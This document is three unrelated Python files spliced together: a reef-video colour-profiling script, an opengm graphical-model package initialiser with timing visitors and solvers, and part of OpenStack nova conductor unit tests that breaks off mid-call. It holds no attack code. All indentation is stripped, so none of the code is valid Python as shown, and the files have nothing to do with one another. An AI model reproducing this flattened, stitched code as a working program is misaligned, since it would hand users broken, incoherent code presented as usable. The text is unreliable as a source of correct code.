window= numpy.ones(int(window_size))/float(window_size)
return numpy.convolve(interval, window, 'same')
def plotProfile(plotname, data):
''' Plot a profile of the colors'''
dtc=None
if args.window:
dt=numpy.transpose(data)
for i in range(dt.shape[0]):
dt[i]=movingAverage(dt[i], args.window)
dtc=numpy.transpose(dt)
else:
dtc=data
fontP = FontProperties()
fontP.set_size('small')
fig = plt.figure()
ax = plt.subplot(111)
ax.plot(dtc)
#ax.set_xticklabels(xlabels, rotation=45, fontproperties=fontP)
#ax.set_xlabel('Image number in the series')
ax.set_ylabel('Reef colors')
box = ax.get_position()
#ax.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height * 0.9])
#ax.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height])
ax.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height *0.85])
header=["blue", "green", "red"]
ax.legend((header), loc='upper center', bbox_to_anchor=(0.5, -0.10), ncol=4, prop=fontP)
fig.savefig(plotname)
def printImages(filename, imgs, band):
keys = imgs.keys()
if len(keys)-1 <= 0:
sys.stderr.write("No more images to write. skipped\n")
return
if not os.path.exists(str(band)):
os.mkdir(str(band))
for i in range(int(args.number)):
r = random.randint(0, len(imgs)-1)
savedImages[keys[r]] = band
cv2.imwrite(str(band) + os.path.sep + str(keys[r]) + "." + filename + ".JPG", imgs[keys[r]])
sys.stderr.write("Saved images from " + str(filename) + " after band " + str(band) + " are: " + " ".join(map (str, savedImages.keys())) + "\n")
def printAnImage(img, filename, count, loc):
outfile = str(loc) + os.path.sep + str(count) + "." + filename + ".JPG";
sys.stderr.write("Saving " + outfile + "\n")
cv2.imwrite(outfile, img)
## proess the first image
vid = cv2.VideoCapture(args.file[0])
if vid.isOpened():
print("Reading video " + args.file[0])
else:
sys.stderr.write("There was an error opening " + args.file[0] + "\n")
sys.exit()
paths = args.file[0].split('/')
videoFileName = paths[-1]
sys.stderr.write("Parsing images in " + args.file[0] + " (" + videoFileName + ")\n")
ret, img = vid.read()
average=[]
count=0
band=1
allpeaks=[]
imgset = {}
lastimwrite=0
while (ret):
count += 1
if (count < args.ignore):
ret, img = vid.read()
continue
rgb=[]
for i in range(3):
channel = img[:,:,i]
if args.median:
rgb.append(numpy.median(channel))
else:
rgb.append(numpy.average(channel))
if (count % 1000) < 1:
sys.stderr.write(str(count) + ": " + str(rgb[0]) + " " + str(rgb[1]) + " " + str(rgb[2]) + "\n")
if rgb[0] > 200 or rgb[1] > 200 or rgb[2] > 200:
sys.stderr.write('Peak at ' + str(count) + " with blue: " + str(rgb[0]) + " green: " + str(rgb[1]) + " red: " + str(rgb[2]) + "\n")
allpeaks.append(count)
if count - lastimwrite > 300 and len(imgset.keys()) >= 1: #this is because we may have multiple images with BGR >150. This requires 10s between peaks (at 30 fps)
sys.stderr.write("Writing images at " + str(count) + "\n")
printImages(videoFileName, imgset, band)
band+=1
lastimwrite=count
imgset = {}
rint = random.randint(1, 100)
if rint == 1: # choose 1:100 images first, and than randomly from those
imgset[count]=img
average.append(rgb)
ret, img = vid.read()
if args.frames > 1 and count > args.frames:
ret = False
sys.stderr.write("Read " + str(count) + " images\n")
# finish off the file
allpeaks.append(count)
sys.stderr.write("Writing images at the end of the file\n")
printImages(videoFileName, imgset, band)
# now use kmeans to identify the rgb peaks.
peaks, variance = vq.kmeans(numpy.array(allpeaks), band)
peaks.sort()
sys.stderr.write("The peaks are at " + str(peaks) + "\n")
filename = videoFileName + ".profile.png"
filename.replace('.MP4', '')
sys.stderr.write("Plotting a profile in " + filename + "\n")
plotProfile(filename, average)
## process the other files
for fileNo in range(1, len(args.file)):
sys.stderr.write("Processing " + args.file[fileNo] + "\n")
vid = cv2.VideoCapture(args.file[fileNo])
paths = args.file[fileNo].split('/')
videoFileName = paths[-1]
ret, img = vid.read()
average=[]
count=0
lastimwrite=0
myallpeaks = []
while (ret):
count+=1
if (count < args.ignore):
ret, img = vid.read()
continue
rgb=[]
for i in range(3):
channel = img[:,:,i]
if args.median:
rgb.append(numpy.median(channel))
else:
rgb.append(numpy.average(channel))
average.append(rgb)
if (count % 1000) < 1:
sys.stderr.write(videoFileName + " : " + str(count) + ": " + str(rgb[0]) + " " + str(rgb[1]) + " " + str(rgb[2]) + "\n")
if rgb[0] > 200 or rgb[1] > 200 or rgb[2] > 200:
sys.stderr.write('Peak at ' + str(count) + " with blue: " + str(rgb[0]) + " green: " + str(rgb[1]) + " red: " + str(rgb[2]) + "\n")
myallpeaks.append(count)
ret, img = vid.read()
# finish off the file
myallpeaks.append(count)
sys.stderr.write("Writing images at the end of the file\n")
printImages(videoFileName, imgset, band)
## do we have the same number of peaks
mypeaks, variance = vq.kmeans(numpy.array(myallpeaks), peaks)
mypeaks.sort()
sys.stderr.write("The peaks are at " + str(mypeaks) + "\n")
diff=[]
for p in mypeaks:
peakdiff=[]
for q in peaks:
peakdiff.append(abs(p-q))
peakdiff.sort()
diff.append(peakdiff[0])
diff.sort()
mindiff = diff[0]
maxdiff = diff[-1]
difference = int(numpy.average(diff))
sys.stderr.write("The average delay between " + videoFileName + " and " + args.file[0] + " is " + str(difference) + " frames from " + str(mindiff) + " to " + str(maxdiff) + ".\n")
filename = videoFileName + ".profile.png"
filename.replace('.MP4', '')
plotProfile(filename, average)
sys.stderr.write("Running through the second iteration of " + videoFileName)
vid = cv2.VideoCapture(args.file[fileNo])
ret, img = vid.read()
count=0
while (ret):
count+=1
if (count < args.ignore):
ret, img = vid.read()
continue
for correctedImage in range(count - maxdiff, count - mindiff):
if correctedImage in savedImages:
outputlocation = os.path.sep.join([str(savedImages[correctedImage]), str(correctedImage)])
if not os.path.exists(outputlocation):
os.mkdir(outputlocation)
sys.stderr.write("Saving " + str(correctedImage) + " as we are at " + str(count) + "\n")
#printAnImage(img, videoFileName, correctedImage, savedImages[correctedImage])
printAnImage(img, videoFileName, count, outputlocation)
ret, img = vid.read()
|
|
#from opengmcore import _opengmcore.adder as adder
from opengmcore import *
from __version__ import version
from functionhelper import *
from _inf_param import _MetaInfParam , InfParam
from _visu import visualizeGm
from _misc import defaultAccumulator
from __version__ import version
import time
from _inference_interface_generator import _inject_interface , InferenceBase
import inference
import hdf5
import benchmark
# initialize solver/ inference dictionaries
_solverDicts=[
(inference.adder.minimizer.solver.__dict__ , 'adder', 'minimizer' ),
(inference.adder.maximizer.solver.__dict__, 'adder', 'maximizer' ),
(inference.multiplier.integrator.solver.__dict__,'adder', 'integrator'),
(inference.multiplier.minimizer.solver.__dict__, 'multiplier', 'minimizer' ),
(inference.multiplier.maximizer.solver.__dict__, 'multiplier', 'maximizer' ),
(inference.multiplier.integrator.solver.__dict__,'multiplier', 'integrator')
]
for infClass,infName in _inject_interface(_solverDicts):
inference.__dict__[infName]=infClass
class Timer(object):
def __init__(self, name=None):
self.name = name
def __enter__(self):
if self.name:
print '[%s]' % self.name
self.tstart = time.time()
def __exit__(self, type, value, traceback):
#if self.name:
# print '[%s]' % self.name,
print ' Elapsed: %s' % (time.time() - self.tstart)
def weightRandomizer(noiseType = 'normalAdd', noiseParam=1.0, seed=42, ignoreSeed = True):
p = inference.adder.minimizer.solver._WeightRandomizerParameter_()
ntenum = inference.adder.minimizer.solver._WeightRandomization_NoiseType_
if noiseType == 'none' or noiseType =='noNoise':
nt =ntenum.none
elif noiseType == 'normalAdd':
nt =ntenum.normalAdd
elif noiseType == 'normalMult':
nt =ntenum.normalMult
elif noiseType == 'uniformAdd':
nt =ntenum.uniformAdd
else:
raise RuntimeError("unknown noise type")
p.noiseType = nt
p.noiseParam = float(noiseParam)
p.seed = int(seed)
p.ignoreSeed = bool(ignoreSeed)
return p
def saveGm(gm, f, d='gm'):
""" save a graphical model to a hdf5 file:
Args:
gm : graphical model to save
f : filepath
g : dataset (defaut : 'gm')
"""
hdf5.saveGraphicalModel(gm, f, d)
def loadGm(f, d='gm', operator='adder'):
""" save a graphical model to a hdf5 file:
Args:
f : filepath
g : dataset (defaut : 'gm')
operator : operator of the graphical model ('adder' / 'multiplier')
"""
if(operator=='adder'):
gm=adder.GraphicalModel()
elif(operator=='multiplier'):
gm=multiplier.GraphicalModel()
else:
raise RuntimeError("unknown operator: "+ operator)
hdf5.loadGraphicalModel(gm,f,d)
return gm
class TestModels(object):
@staticmethod
def chain3(nVar,nLabels):
model=adder.GraphicalModel([nLabels]*nVar)
unaries = numpy.random.rand(nVar,nLabels)
model.addFactors(model.addFunctions(unaries),numpy.arange(nVar))
numpy.random.seed(42)
for x0 in range(nVar-2):
f=numpy.random.rand(nLabels,nLabels,nLabels)
model.addFactor(model.addFunction(f),[x0,x0+1,x0+2])
return model
@staticmethod
def chain4(nVar,nLabels):
model=adder.GraphicalModel([nLabels]*nVar)
unaries = numpy.random.rand(nVar,nLabels)
model.addFactors(model.addFunctions(unaries),numpy.arange(nVar))
numpy.random.seed(42)
for x0 in range(nVar-3):
f=numpy.random.rand(nLabels,nLabels,nLabels,nLabels)
model.addFactor(model.addFunction(f),[x0,x0+1,x0+2,x0+3])
return model
@staticmethod
def chainN(nVar,nLabels,order,nSpecialUnaries=0,beta=1.0):
model=adder.GraphicalModel([nLabels]*nVar)
unaries = numpy.random.rand(nVar,nLabels)
for sn in range(nSpecialUnaries):
r=int(numpy.random.rand(1)*nVar-1)
rl=int(numpy.random.rand(1)*nLabels-1)
unaries[r,rl]=0.0
model.addFactors(model.addFunctions(unaries),numpy.arange(nVar))
numpy.random.seed(42)
for x0 in range(nVar-(order-1)):
f=numpy.random.rand( *([nLabels]*order))
f*=beta
vis=numpy.arange(order)
vis+=x0
model.addFactor(model.addFunction(f),vis)
return model
@staticmethod
def secondOrderGrid(dx,dy,nLabels):
nVar=dx*dy
model=adder.GraphicalModel([nLabels]*nVar)
unaries = numpy.random.rand(nVar,nLabels)
model.addFactors(model.addFunctions(unaries),numpy.arange(nVar))
vis2Order=secondOrderGridVis(dx,dy,True)
nF2=len(vis2Order)#.shape[0]
f2s=numpy.random.rand(nF2,nLabels)
model.addFactors(model.addFunctions(f2s),vis2Order)
return model
class GenericTimingVisitor(object):
def __init__(self,visitNth=1,reserve=0,verbose=True,multiline=True):
self.visitNth=visitNth
self.reserve=reserve
self.verbose=verbose
self.multiline=multiline
self.values_ = None
self.runtimes_ = None
self.bounds_ = None
self.iterations_ = None
self.t0 = None
self.t1 = None
self.iterNr = 0
def getValues(self):
return numpy.require(self.values_,dtype=value_type)
def getTimes(self):
return numpy.require(self.runtimes_,dtype=value_type)
def getBounds(self):
return numpy.require(self.bounds_,dtype=value_type)
def getIterations(self):
return numpy.require(self.iterations_,dtype=value_type)
def begin(self,inf):
v = inf.value()
b = inf.bound()
self.values_ =[v]
self.bounds_ =[b]
self.runtimes_ =[0.0]
self.iterations_=[self.iterNr]
if self.verbose :
print 'Begin : %d Value : %f Bound : %f '%(self.iterNr,v,b)
# start the timing
self.t0 =time.time()
self.t1 =time.time()
def visit(self,inf):
if(self.iterNr==0 or self.iterNr%self.visitNth==0):
# "stop the timing"
self.t1=time.time()
# get the runtime of the run
rt=self.t1-self.t0
v = inf.value()
b = inf.bound()
if self.verbose :
print 'Step : %d Value : %f Bound : %f '%(self.iterNr,v,b)
# store results
self.values_.append(v)
self.bounds_.append(b)
self.runtimes_.append(rt)
self.iterations_.append(self.iterNr)
# increment iteration number
self.iterNr+=1
# restart the timing
self.t0=time.time()
else:
# increment iteration number
self.iterNr+=1
def end(self,inf):
# "stop the timing"
self.t1=time.time()
# get the runtime of the run
rt=self.t1-self.t0
v = inf.value()
b = inf.bound()
if self.verbose :
print 'End : %d Value : %f Bound : %f '%(self.iterNr,v,b)
# store results
self.values_.append(v)
self.bounds_.append(b)
self.runtimes_.append(rt)
self.iterations_.append(self.iterNr)
class __RandomFusion__(object):
def __init__(self,gm,accumulator=None,parameter=InfParam()):
if accumulator is None:
self.accumulator=defaultAccumulator(gm=gm)
else:
self.accumulator=accumulator
kwargs=parameter.kwargs
self.gm_=gm
self.steps = kwargs.get('steps', 100)
self.fusionSolver = kwargs.get('fuisionSolver', 'lf2')
self.arg_ = None
self.value_ = None
self.fusionMover=inference.adder.minimizer.FusionMover(self.gm_)
self.nLabels = self.gm_.numberOfLabels(0)
self.nVar = self.gm_.numberOfVariables
def timingVisitor(self,visitNth=1,reserve=0,verbose=True,multiline=True):
return GenericTimingVisitor(visitNth,reserve,verbose,multiline)
def setStartingPoint(self,arg):
self.arg_=arg
self.value_=gm.evaluate(self.arg_)
def infer(self,visitor=None):
if(self.arg_ is None):
self.arg_ = numpy.zeros(self.gm_.numberOfVariables,dtype=label_type)
self.value_ = self.value_=self.gm_.evaluate(self.arg_)
# start inference
if visitor is not None:
visitor.begin(self)
# start fusion moves
for x in range(self.steps):
randState=numpy.random.randint(low=0, high=self.nLabels, size=self.nVar).astype(label_type)
r = self.fusionMover.fuse(self.arg_,randState,self.fusionSolver)
self.arg_=r[0]
self.value_=r[1]
visitor.visit(self)
# end inference
if visitor is not None:
visitor.end(self)
def name(self):
return "RandomFusion"
def bound(self):
return -1.0*float('inf')
def arg(self):
return self.arg_
def value(self):
return self.value_
class __CheapInitialization__(object):
def __init__(self,gm,accumulator=None,parameter=InfParam()):
if accumulator is None:
self.accumulator=defaultAccumulator(gm=gm)
else:
self.accumulator=accumulator
kwargs=parameter.kwargs
self.gm_=gm
self.arg_ = None
self.value_ = None
self.initType = kwargs.get('initType', 'localOpt')
def timingVisitor(self,visitNth=1,reserve=0,verbose=True,multiline=True):
return GenericTimingVisitor(visitNth,reserve,verbose,multiline)
def setStartingPoint(self,arg):
self.arg_=arg
self.value_=gm.evaluate(self.arg_)
def infer(self,visitor=None):
if(self.arg_ is None):
self.arg_ = numpy.zeros(self.gm_.numberOfVariables,dtype=label_type)
self.value_ = self.value_=self.gm_.evaluate(self.arg_)
# start inference
if visitor is not None:
visitor.begin(self)
if(self.initType=='localOpt'):
print "move local opt"
self.arg_ = self.gm_.moveLocalOpt('minimizer')
print "done"
if visitor is not None:
visitor.visit(self)
# end inference
if visitor is not None:
visitor.end(self)
def name(self):
return "CheapInitialization"
def bound(self):
return -1.0*float('inf')
def arg(self):
return self.arg_
def value(self):
return self.value_
inference.__dict__['CheapInitialization']=__CheapInitialization__
inference.__dict__['RandomFusion']=__RandomFusion__
if __name__ == "__main__":
pass
|
|
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for the conductor service."""
import mox
from nova.api.ec2 import ec2utils
from nova.compute import flavors
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import conductor
from nova.conductor import api as conductor_api
from nova.conductor import manager as conductor_manager
from nova.conductor import rpcapi as conductor_rpcapi
from nova import context
from nova import db
from nova.db.sqlalchemy import models
from nova import exception as exc
from nova import notifications
from nova.objects import instance as instance_obj
from nova.openstack.common import jsonutils
from nova.openstack.common.notifier import api as notifier_api
from nova.openstack.common.notifier import test_notifier
from nova.openstack.common.rpc import common as rpc_common
from nova.openstack.common import timeutils
from nova import quota
from nova import test
from nova.tests.compute import test_compute
from nova.tests import fake_instance_actions
FAKE_IMAGE_REF = 'fake-image-ref'
class FakeContext(context.RequestContext):
def elevated(self):
"""Return a consistent elevated context so we can detect it."""
if not hasattr(self, '_elevated'):
self._elevated = super(FakeContext, self).elevated()
return self._elevated
class _BaseTestCase(object):
def setUp(self):
super(_BaseTestCase, self).setUp()
self.db = None
self.user_id = 'fake'
self.project_id = 'fake'
self.context = FakeContext(self.user_id, self.project_id)
notifier_api._reset_drivers()
self.addCleanup(notifier_api._reset_drivers)
self.flags(notification_driver=[test_notifier.__name__])
test_notifier.NOTIFICATIONS = []
def stub_out_client_exceptions(self):
def passthru(exceptions, func, *args, **kwargs):
return func(*args, **kwargs)
self.stubs.Set(rpc_common, 'catch_client_exception', passthru)
def _create_fake_instance(self, params=None, type_name='m1.tiny'):
if not params:
params = {}
inst = {}
inst['vm_state'] = vm_states.ACTIVE
inst['image_ref'] = FAKE_IMAGE_REF
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = self.user_id
inst['project_id'] = self.project_id
inst['host'] = 'fake_host'
type_id = flavors.get_flavor_by_name(type_name)['id']
inst['instance_type_id'] = type_id
inst['ami_launch_index'] = 0
inst['memory_mb'] = 0
inst['vcpus'] = 0
inst['root_gb'] = 0
inst['ephemeral_gb'] = 0
inst['architecture'] = 'x86_64'
inst['os_type'] = 'Linux'
inst['availability_zone'] = 'fake-az'
inst.update(params)
return db.instance_create(self.context, inst)
def _do_update(self, instance_uuid, **updates):
return self.conductor.instance_update(self.context, instance_uuid,
updates)
def test_instance_update(self):
instance = self._create_fake_instance()
new_inst = self._do_update(instance['uuid'],
vm_state=vm_states.STOPPED)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance['vm_state'], vm_states.STOPPED)
self.assertEqual(new_inst['vm_state'], instance['vm_state'])
def test_action_event_start(self):
self.mox.StubOutWithMock(db, 'action_event_start')
db.action_event_start(self.context, mox.IgnoreArg())
self.mox.ReplayAll()
self.conductor.action_event_start(self.context, {})
def test_action_event_finish(self):
self.mox.StubOutWithMock(db, 'action_event_finish')
db.action_event_finish(self.context, mox.IgnoreArg())
self.mox.ReplayAll()
self.conductor.action_event_finish(self.context, {})
def test_instance_update_invalid_key(self):
# NOTE(danms): the real DB API call ignores invalid keys
if self.db == None:
self.stub_out_client_exceptions()
self.assertRaises(KeyError,
self._do_update, 'any-uuid', foobar=1)
def test_migration_get(self):
migration = db.migration_create(self.context.elevated(),
{'instance_uuid': 'fake-uuid',
'status': 'migrating'})
self.assertEqual(jsonutils.to_primitive(migration),
self.conductor.migration_get(self.context,
migration['id']))
def test_migration_get_unconfirmed_by_dest_compute(self):
self.mox.StubOutWithMock(db,
'migration_get_unconfirmed_by_dest_compute')
db.migration_get_unconfirmed_by_dest_compute(self.context,
'fake-window',
'fake-host')
self.mox.ReplayAll()
self.conductor.migration_get_unconfirmed_by_dest_compute(self.context,
'fake-window',
'fake-host')
def test_migration_get_in_progress_by_host_and_node(self):
self.mox.StubOutWithMock(db,
'migration_get_in_progress_by_host_and_node')
db.migration_get_in_progress_by_host_and_node(
self.context, 'fake-host', 'fake-node').AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.migration_get_in_progress_by_host_and_node(
self.context, 'fake-host', 'fake-node')
self.assertEqual(result, 'fake-result')
def test_migration_create(self):
inst = {'uuid': 'fake-uuid',
'host': 'fake-host',
'node': 'fake-node'}
self.mox.StubOutWithMock(db, 'migration_create')
db.migration_create(self.context.elevated(),
{'instance_uuid': inst['uuid'],
'source_compute': inst['host'],
'source_node': inst['node'],
'fake-key': 'fake-value'}).AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.migration_create(self.context, inst,
{'fake-key': 'fake-value'})
self.assertEqual(result, 'result')
def test_migration_update(self):
migration = db.migration_create(self.context.elevated(),
{'instance_uuid': 'fake-uuid',
'status': 'migrating'})
migration_p = jsonutils.to_primitive(migration)
migration = self.conductor.migration_update(self.context, migration_p,
'finished')
self.assertEqual(migration['status'], 'finished')
def test_instance_get_by_uuid(self):
orig_instance = self._create_fake_instance()
copy_instance = self.conductor.instance_get_by_uuid(
self.context, orig_instance['uuid'])
self.assertEqual(orig_instance['name'],
copy_instance['name'])
def _setup_aggregate_with_host(self):
aggregate_ref = db.aggregate_create(self.context.elevated(),
{'name': 'foo'}, metadata={'availability_zone': 'foo'})
self.conductor.aggregate_host_add(self.context, aggregate_ref, 'bar')
aggregate_ref = db.aggregate_get(self.context.elevated(),
aggregate_ref['id'])
return aggregate_ref
def test_aggregate_host_add(self):
aggregate_ref = self._setup_aggregate_with_host()
self.assertTrue(any([host == 'bar'
for host in aggregate_ref['hosts']]))
db.aggregate_delete(self.context.elevated(), aggregate_ref['id'])
def test_aggregate_host_delete(self):
aggregate_ref = self._setup_aggregate_with_host()
self.conductor.aggregate_host_delete(self.context, aggregate_ref,
'bar')
aggregate_ref = db.aggregate_get(self.context.elevated(),
aggregate_ref['id'])
self.assertFalse(any([host == 'bar'
for host in aggregate_ref['hosts']]))
db.aggregate_delete(self.context.elevated(), aggregate_ref['id'])
def test_aggregate_get(self):
aggregate_ref = self._setup_aggregate_with_host()
aggregate = self.conductor.aggregate_get(self.context,
aggregate_ref['id'])
self.assertEqual(jsonutils.to_primitive(aggregate_ref), aggregate)
db.aggregate_delete(self.context.elevated(), aggregate_ref['id'])
def test_aggregate_get_by_host(self):
self._setup_aggregate_with_host()
aggregates = self.conductor.aggregate_get_by_host(self.context, 'bar')
self.assertEqual(aggregates[0]['availability_zone'], 'foo')
def test_aggregate_metadata_add(self):
aggregate = {'name': 'fake aggregate', 'id': 'fake-id'}
metadata = {'foo': 'bar'}
self.mox.StubOutWithMock(db, 'aggregate_metadata_add')
db.aggregate_metadata_add(
mox.IgnoreArg(), aggregate['id'], metadata, False).AndReturn(
metadata)
self.mox.ReplayAll()
result = self.conductor.aggregate_metadata_add(self.context,
aggregate,
metadata)
self.assertEqual(result, metadata)
def test_aggregate_metadata_delete(self):
aggregate = {'name': 'fake aggregate', 'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'aggregate_metadata_delete')
db.aggregate_metadata_delete(mox.IgnoreArg(), aggregate['id'], 'fake')
self.mox.ReplayAll()
self.conductor.aggregate_metadata_delete(self.context, aggregate,
'fake')
def test_aggregate_metadata_get_by_host(self):
self.mox.StubOutWithMock(db, 'aggregate_metadata_get_by_host')
db.aggregate_metadata_get_by_host(self.context, 'host',
'key').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.aggregate_metadata_get_by_host(self.context,
'host', 'key')
self.assertEqual(result, 'result')
def test_bw_usage_update(self):
self.mox.StubOutWithMock(db, 'bw_usage_update')
self.mox.StubOutWithMock(db, 'bw_usage_get')
update_args = (self.context, 'uuid', 'mac', 0, 10, 20, 5, 10, 20)
get_args = (self.context, 'uuid', 0, 'mac')
db.bw_usage_update(*update_args, update_cells=True)
db.bw_usage_get(*get_args).AndReturn('foo')
self.mox.ReplayAll()
result = self.conductor.bw_usage_update(*update_args)
self.assertEqual(result, 'foo')
def test_security_group_get_by_instance(self):
fake_instance = {'uuid': 'fake-instance'}
self.mox.StubOutWithMock(db, 'security_group_get_by_instance')
db.security_group_get_by_instance(
self.context, fake_instance['uuid']).AndReturn('it worked')
self.mox.ReplayAll()
result = self.conductor.security_group_get_by_instance(self.context,
fake_instance)
self.assertEqual(result, 'it worked')
def test_security_group_rule_get_by_security_group(self):
fake_secgroup = {'id': 'fake-secgroup'}
self.mox.StubOutWithMock(db,
'security_group_rule_get_by_security_group')
db.security_group_rule_get_by_security_group(
self.context, fake_secgroup['id']).AndReturn('it worked')
self.mox.ReplayAll()
result = self.conductor.security_group_rule_get_by_security_group(
self.context, fake_secgroup)
self.assertEqual(result, 'it worked')
def test_provider_fw_rule_get_all(self):
fake_rules = ['a', 'b', 'c']
self.mox.StubOutWithMock(db, 'provider_fw_rule_get_all')
db.provider_fw_rule_get_all(self.context).AndReturn(fake_rules)
self.mox.ReplayAll()
result = self.conductor.provider_fw_rule_get_all(self.context)
self.assertEqual(result, fake_rules)
def test_agent_build_get_by_triple(self):
self.mox.StubOutWithMock(db, 'agent_build_get_by_triple')
db.agent_build_get_by_triple(self.context, 'fake-hv', 'fake-os',
'fake-arch').AndReturn('it worked')
self.mox.ReplayAll()
result = self.conductor.agent_build_get_by_triple(self.context,
'fake-hv',
'fake-os',
'fake-arch')
self.assertEqual(result, 'it worked')
def test_block_device_mapping_get_all_by_instance(self):
fake_inst = {'uuid': 'fake-uuid'}
self.mox.StubOutWithMock(db,
'block_device_mapping_get_all_by_instance')
db.block_device_mapping_get_all_by_instance(
self.context, fake_inst['uuid']).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.block_device_mapping_get_all_by_instance(
self.context, fake_inst, legacy=False)
self.assertEqual(result, 'fake-result')
def test_instance_get_active_by_window_joined(self):
self.mox.StubOutWithMock(db, 'instance_get_active_by_window_joined')
db.instance_get_active_by_window_joined(self.context, 'fake-begin',
'fake-end', 'fake-proj',
'fake-host')
self.mox.ReplayAll()
self.conductor.instance_get_active_by_window_joined(
self.context, 'fake-begin', 'fake-end', 'fake-proj', 'fake-host')
def test_instance_destroy(self):
self.mox.StubOutWithMock(db, 'instance_destroy')
db.instance_destroy(self.context, 'fake-uuid')
self.mox.ReplayAll()
self.conductor.instance_destroy(self.context, {'uuid': 'fake-uuid'})
def test_instance_info_cache_delete(self):
self.mox.StubOutWithMock(db, 'instance_info_cache_delete')
db.instance_info_cache_delete(self.context, 'fake-uuid')
self.mox.ReplayAll()
self.conductor.instance_info_cache_delete(self.context,
{'uuid': 'fake-uuid'})
def test_instance_info_cache_update(self):
fake_values = {'key1': 'val1', 'key2': 'val2'}
fake_instance = {'uuid': 'fake-uuid'}
self.mox.StubOutWithMock(db, 'instance_info_cache_update')
db.instance_info_cache_update(self.context, 'fake-uuid',
fake_values)
self.mox.ReplayAll()
self.conductor.instance_info_cache_update(self.context,
fake_instance,
fake_values)
def test_flavor_get(self):
self.mox.StubOutWithMock(db, 'flavor_get')
db.flavor_get(self.context, 'fake-id').AndReturn('fake-type')
self.mox.ReplayAll()
result = self.conductor.instance_type_get(self.context, 'fake-id')
self.assertEqual(result, 'fake-type')
def test_vol_get_usage_by_time(self):
self.mox.StubOutWithMock(db, 'vol_get_usage_by_time')
db.vol_get_usage_by_time(self.context, 'fake-time').AndReturn(
'fake-usage')
self.mox.ReplayAll()
result = self.conductor.vol_get_usage_by_time(self.context,
'fake-time')
self.assertEqual(result, 'fake-usage')
def test_vol_usage_update(self):
self.mox.StubOutWithMock(db, 'vol_usage_update')
self.mox.StubOutWithMock(test_notifier, 'notify')
self.mox.StubOutWithMock(compute_utils, 'usage_volume_info')
fake_inst = {'uuid': 'fake-uuid',
'project_id': 'fake-project',
'user_id': 'fake-user',
'availability_zone': 'fake-az',
}
db.vol_usage_update(self.context, 'fake-vol', 22, 33, 44, 55,
fake_inst['uuid'],
fake_inst['project_id'],
fake_inst['user_id'],
fake_inst['availability_zone'],
False).AndReturn('fake-usage')
compute_utils.usage_volume_info('fake-usage').AndReturn('fake-info')
notifier_api.notify(self.context,
'conductor.%s' % self.conductor_manager.host,
'volume.usage', notifier_api.INFO,
'fake-info')
self.mox.ReplayAll()
self.conductor.vol_usage_update(self.context, 'fake-vol',
22, 33, 44, 55, fake_inst,
'fake-update-time', False)
def test_compute_node_create(self):
self.mox.StubOutWithMock(db, 'compute_node_create')
db.compute_node_create(self.context, 'fake-values').AndReturn(
'fake-result')
self.mox.ReplayAll()
result = self.conductor.compute_node_create(self.context,
'fake-values')
self.assertEqual(result, 'fake-result')
def test_compute_node_update(self):
node = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'compute_node_update')
db.compute_node_update(self.context, node['id'], 'fake-values',
False).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.compute_node_update(self.context, node,
'fake-values', False)
self.assertEqual(result, 'fake-result')
def test_compute_node_delete(self):
node = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'compute_node_delete')
db.compute_node_delete(self.context, node['id']).AndReturn(None)
self.mox.ReplayAll()
result = self.conductor.compute_node_delete(self.context, node)
self.assertEqual(result, None)
def test_instance_fault_create(self):
self.mox.StubOutWithMock(db, 'instance_fault_create')
db.instance_fault_create(self.context, 'fake-values').AndReturn(
'fake-result')
self.mox.ReplayAll()
result = self.conductor.instance_fault_create(self.context,
'fake-values')
self.assertEqual(result, 'fake-result')
def test_task_log_get(self):
self.mox.StubOutWithMock(db, 'task_log_get')
db.task_log_get(self.context, 'task', 'begin', 'end', 'host',
'state').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_get(self.context, 'task', 'begin',
'end', 'host', 'state')
self.assertEqual(result, 'result')
def test_task_log_get_with_no_state(self):
self.mox.StubOutWithMock(db, 'task_log_get')
db.task_log_get(self.context, 'task', 'begin', 'end',
'host', None).AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_get(self.context, 'task', 'begin',
'end', 'host')
self.assertEqual(result, 'result')
def test_task_log_begin_task(self):
self.mox.StubOutWithMock(db, 'task_log_begin_task')
db.task_log_begin_task(self.context.elevated(), 'task', 'begin',
'end', 'host', 'items',
'message').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_begin_task(
self.context, 'task', 'begin', 'end', 'host', 'items', 'message')
self.assertEqual(result, 'result')
def test_task_log_end_task(self):
self.mox.StubOutWithMock(db, 'task_log_end_task')
db.task_log_end_task(self.context.elevated(), 'task', 'begin', 'end',
'host', 'errors', 'message').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_end_task(
self.context, 'task', 'begin', 'end', 'host', 'errors', 'message')
self.assertEqual(result, 'result')
def test_notify_usage_exists(self):
info = {
'audit_period_beginning': 'start',
'audit_period_ending': 'end',
'bandwidth': 'bw_usage',
'image_meta': {},
'extra': 'info',
}
instance = {
'system_metadata': [],
}
self.mox.StubOutWithMock(notifications, 'audit_period_bounds')
self.mox.StubOutWithMock(notifications, 'bandwidth_usage')
self.mox.StubOutWithMock(compute_utils, 'notify_about_instance_usage')
notifications.audit_period_bounds(False).AndReturn(('start', 'end'))
notifications.bandwidth_usage(instance, 'start', True).AndReturn(
'bw_usage')
compute_utils.notify_about_instance_usage(self.context, instance,
'exists',
system_metadata={},
